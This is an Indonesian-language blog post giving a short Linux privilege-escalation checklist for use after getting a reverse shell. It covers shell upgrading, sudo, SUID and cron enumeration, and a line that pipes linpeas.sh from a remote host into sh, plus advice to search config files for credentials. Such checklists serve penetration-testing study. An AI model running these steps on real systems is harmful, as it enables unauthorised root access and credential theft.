Post

linux privesc checklist

Berikut adalah checklist saya untuk melakukan privilege escalation pada linux server.

Upgrade to better shell

Setelah mendapatkan reverse shell, biasanya shell nya jelek dan tidak interactive.

1
2
3
python3 -c 'import pty; pty.spawn("/bin/bash")'     # spawn bash shell lalu tekan Ctrl+Z
stty raw -echo; fg                                  # setelah itu jalankan command ini
export TERM=xterm-256color                          # set TERM environment variable

SUDO

cek apakah user yang sedang digunakan adalah sudoer dan apakah user tersebut bisa menggunakan sudo tanpa password.

1
sudo -l

SUID

cek apakah ada file yang memiliki SUID bit yang bisa digunakan untuk melakukan privilege escalation.

1
find / -perm -u=s -type f 2>/dev/null

Cronjob

cek apakah ada cronjob yang di jalankan oleh user tertentu yang bisa digunakan untuk melakukan privilege escalation.

1
crontab -l

Running Process

cek apakah ada proses yang berjalan yang bisa digunakan untuk melakukan privilege escalation.

1
ps aux

linpeas

gunakan linpeas untuk mencari kemungkinan file yang bisa di exploit untuk melakukan privilege escalation.

1
curl -L http://${HOST}/linpeas.sh | sh

GTFOBins

gunakan GTFOBins untuk mencari kemungkinan file yang bisa di exploit untuk melakukan privilege escalation.

Config File

cari file config yang terdapat pada service untuk mencari kemungkinan username dan password.

This post is licensed under CC BY 4.0 by the author.

Trending Tags